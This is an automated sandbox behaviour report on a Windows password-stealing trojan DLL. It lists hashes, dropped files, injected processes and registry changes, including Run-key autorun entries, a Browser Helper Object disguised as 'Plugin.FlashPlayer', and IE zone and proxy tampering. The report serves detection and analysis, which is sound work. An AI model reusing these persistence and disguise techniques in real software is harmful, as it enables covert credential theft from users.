MD5: 12cff1b8d88a499ae26d0a6618c799ed
SHA1: c97a334459acbb593ac662fe44aadc5efd2e5c2f
SHA256: 39d243f5099851f228478d69aa0758760771b6220f925d219eda68748de99d4f
SSDeep: 3072:jHrScoJ9SObJIfOB0tpmJvtk6jhWrLLByesw L99vDq0 y8Gemsfq/eBJNF7i8D6:bLSJV7SoXDm0 VGAyWv
Size: 289792 bytes
File type: DLL
Platform: WIN32
Entropy: Not Packed
PEID: BorlandDelphi30, BorlandDelphiv30, UPolyXv05_v6
Company: no certificate found
Created at: 1992-06-20 01:22:17
Analyzed on: WindowsXPESX SP3 32-bit

Summary:

Trojan-PSW. Trojan program intended for stealing users passwords.

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

RegSvr32.exe:744
p.exe:2008
mscorsvw.exe:172
regsvr32.exe:1024
ie.exe:1472

The Trojan injects its code into the following process(es):

wilk.exe:1700
p.exe:1536
msv.exe:1820

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process wilk.exe:1700 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\gbclass.dll (7386 bytes)
%Program Files%\Internet Explorer\mswinsck.ocx (1312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ie.exe (353954 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\a.dll (16222 bytes)

The process p.exe:2008 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\Bactria.xs (2104 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nslB5.tmp\Bactria.dll (2476 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nslB5.tmp\Bactria.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsdB4.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nslB5.tmp (0 bytes)

The process msv.exe:1820 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MT4NMF8J\cJZKeOuBrn4kERxqtaUH3fY6323mHUZFJMgTvxaG2iE[1].eot (8346 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ST4Z62GB\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4PQJGD2V\ServiceLogin[1].htm (4462 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ST4Z62GB\logo_2x[1].png (3393 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4PQJGD2V\DXI1ORHCpsQm3Vp6mXoaTXZ2MAKAc2x4R1uOSeegc5U[1].eot (8343 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MT4NMF8J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ST4Z62GB\avatar_2x[1].png (46 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4PQJGD2V\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\C2HNYZ3R\logo_strip_2x[1].png (4739 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][2].txt (712 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (2728 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\C2HNYZ3R\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\C2HNYZ3R\universal_language_settings-21[1].png (199 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (950 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MT4NMF8J\ServiceLogin[1].htm (5907 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MT4NMF8J\ServiceLogin[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4PQJGD2V\ServiceLogin[1].htm (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][2].txt (0 bytes)

The process regsvr32.exe:1024 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\p.exe (2452 bytes)
%Documents and Settings%\%current user%\Application Data\wilk.exe (182 bytes)
%Documents and Settings%\%current user%\Application Data\nf.xpi (863 bytes)
%Documents and Settings%\%current user%\Application Data\msv.exe (29851 bytes)

The process ie.exe:1472 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Temp\IE9B6.tmp\IE9-support\ienrcore.exe (3574 bytes)
%WinDir%\Temp\IE9B6.tmp\SQMAPI.DLL (141 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~amd64~~8.0.7601.17514.mum (472 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~x86~~8.0.7601.16562.cat (14 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~x86~~8.0.7601.17105.mum (1 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~amd64~~8.0.7600.16385.cat (14 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~amd64~~8.0.7601.17514.cat (20 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~amd64~~8.0.7601.17105.cat (1270 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~amd64~~8.0.7601.16562.cat (830 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support (16 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~x86~~8.0.7601.17514.cat (1404 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~x86~~8.0.7601.17077.mum (1 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-neutral.Extracted.cab (132160 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~x86~~8.0.7601.17077.cat (9 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\NrPolicy.txt (1316 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~amd64~~8.0.7600.16385.mum (1 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\trustedinstaller.exe.manifest (803 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~amd64~~8.0.7601.17077.mum (1 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\ieinfra.manifest (374 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~x86~~8.0.7600.16385.cat (11 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~amd64~~8.0.7601.17077.cat (20 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~amd64~~8.0.7601.16562.mum (1 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~amd64~~8.0.7601.17105.mum (1 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~x86~~8.0.7601.17105.cat (11 bytes)
%WinDir%\IE9_main.log (3233 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~x86~~8.0.7601.16562.mum (1 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support.cab (121 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~x86~~8.0.7600.16385.mum (1 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~x86~~8.0.7601.17514.mum (1 bytes)

The Trojan deletes the following file(s):

%WinDir%\Temp\IE9B6.tmp\IE9-support\ienrcore.exe (0 bytes)
%WinDir%\Temp\IE9B6.tmp\SQMAPI.DLL (0 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~amd64~~8.0.7601.17514.mum (0 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~amd64~~8.0.7601.17077.cat (0 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~amd64~~8.0.7600.16385.cat (0 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~amd64~~8.0.7601.17514.cat (0 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~amd64~~8.0.7601.17105.cat (0 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~amd64~~8.0.7601.16562.cat (0 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support (0 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~x86~~8.0.7601.17514.cat (0 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~x86~~8.0.7601.17077.mum (0 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-neutral.Extracted.cab (0 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~x86~~8.0.7601.17077.cat (0 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\NrPolicy.txt (0 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~amd64~~8.0.7601.17105.mum (0 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\trustedinstaller.exe.manifest (0 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~amd64~~8.0.7601.17077.mum (0 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\ieinfra.manifest (0 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support.cab (0 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~x86~~8.0.7600.16385.cat (0 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~x86~~8.0.7601.16562.cat (0 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~amd64~~8.0.7601.16562.mum (0 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~x86~~8.0.7601.17105.mum (0 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~x86~~8.0.7601.17105.cat (0 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~x86~~8.0.7601.16562.mum (0 bytes)
%WinDir%\Temp\IE9B6.tmp (0 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~x86~~8.0.7600.16385.mum (0 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~amd64~~8.0.7600.16385.mum (0 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~x86~~8.0.7601.17514.mum (0 bytes)

Registry activity

The process wilk.exe:1700 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCR\CLSID\{5D2A4E01-0034-4B1E-A6B5-056B17BB6BD4}\InprocServer32]
"(Default)" = "%WinDir%\gbclass.dll"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"IE.exe" = "Utilitário de Instalação do Windows Internet Explorer 9"

[HKCU\Software\VB and VBA Program Settings\ml\inst]
"inect" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ext\CLSID]
"{5D2A4E01-0034-4B1E-A6B5-056B17BB6BD4}" = "1"

[HKCR\CLSID\{5D2A4E01-0034-4B1E-A6B5-056B17BB6BD4}\InprocServer32]
"ThreadingModel" = "Both"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCR\CLSID\{5D2A4E01-0034-4B1E-A6B5-056B17BB6BD4}]
"(Default)" = "Plugin.FlashPlayer"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "53 B7 DE EC 83 C8 17 D4 56 64 29 EB FA 20 79 C3"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]
"0" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"internet" = "explorer C:\"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

It registers itself as a Browser Helper Object (BHO) to ensure its automatic execution every time Internet Explorer is run. It does this by creating the following registry key(s)/entry(ies):

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{5D2A4E01-0034-4B1E-A6B5-056B17BB6BD4}]
"(Default)" = "Plugin.FlashPlayer"

The process RegSvr32.exe:744 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "19 35 2C 29 3A 38 C2 B2 AC 7E 90 CA 94 90 C5 A9"

[HKCR\CLSID\{5D2A4E01-0034-4B1E-A6B5-056B17BB6BD4}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCR\CLSID\{5D2A4E01-0034-4B1E-A6B5-056B17BB6BD4}\TypeLib]
"(Default)" = "{4B54B44A-8A01-4FC0-9E13-2D5E4FAC2C76}"

[HKCR\Plugin.FlashPlayer\Clsid]
"(Default)" = "{5D2A4E01-0034-4B1E-A6B5-056B17BB6BD4}"

[HKCR\Interface\{62FC1B77-C919-4DB7-9641-1BEB3C8A9609}]
"(Default)" = "_FlashPlayer"

[HKCR\TypeLib\{4B54B44A-8A01-4FC0-9E13-2D5E4FAC2C76}\1.0]
"(Default)" = "Plugin"

[HKCR\CLSID\{5D2A4E01-0034-4B1E-A6B5-056B17BB6BD4}\VERSION]
"(Default)" = "1.0"

[HKCR\CLSID\{5D2A4E01-0034-4B1E-A6B5-056B17BB6BD4}]
"(Default)" = "Plugin.FlashPlayer"

[HKCR\Interface\{62FC1B77-C919-4DB7-9641-1BEB3C8A9609}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{62FC1B77-C919-4DB7-9641-1BEB3C8A9609}\TypeLib]
"(Default)" = "{4B54B44A-8A01-4FC0-9E13-2D5E4FAC2C76}"

[HKCR\CLSID\{5D2A4E01-0034-4B1E-A6B5-056B17BB6BD4}\ProgID]
"(Default)" = "Plugin.FlashPlayer"

[HKCR\TypeLib\{4B54B44A-8A01-4FC0-9E13-2D5E4FAC2C76}\1.0\HELPDIR]
"(Default)" = "%WinDir%"

[HKCR\Interface\{62FC1B77-C919-4DB7-9641-1BEB3C8A9609}\TypeLib]
"Version" = "1.0"

[HKCR\TypeLib\{4B54B44A-8A01-4FC0-9E13-2D5E4FAC2C76}\1.0\0\win32]
"(Default)" = "%WinDir%\gbclass.dll"

[HKCR\CLSID\{5D2A4E01-0034-4B1E-A6B5-056B17BB6BD4}\InprocServer32]
"(Default)" = "%WinDir%\gbclass.dll"

[HKCR\TypeLib\{4B54B44A-8A01-4FC0-9E13-2D5E4FAC2C76}\1.0\FLAGS]
"(Default)" = "0"

[HKCR\Interface\{62FC1B77-C919-4DB7-9641-1BEB3C8A9609}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Plugin.FlashPlayer]
"(Default)" = "Plugin.FlashPlayer"

The process p.exe:1536 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "53 3C FB B6 FF 15 BC 5D 07 C4 95 CE FD 36 A0 44"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\WinRAR]
"HWID" = "7B 38 44 41 46 37 39 38 37 2D 38 44 37 43 2D 34"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

The process p.exe:2008 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9A 50 33 89 74 6F 6B 82 90 3D 48 12 57 B0 9D AA"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

The process mscorsvw.exe:172 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\State]
"AccumulatedWaitIdleTime" = "1260000"

The process msv.exe:1820 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache]
"@xpsp3res.dll,-20001" = "Diagnose Connection Problems..."

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 13 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "99 06 ED B6 6C 71 90 4E B4 E2 E4 23 34 E7 4B E1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"msv.exe" = "%Documents and Settings%\%current user%\Application Data\msv.exe"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process regsvr32.exe:1024 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EB 24 6B 6C A0 25 8B 67 76 2B 63 0F 41 7B 8F 9E"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\Application Data]
"wilk.exe" = "WindowsApplication1"

"msv.exe" = "msv"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

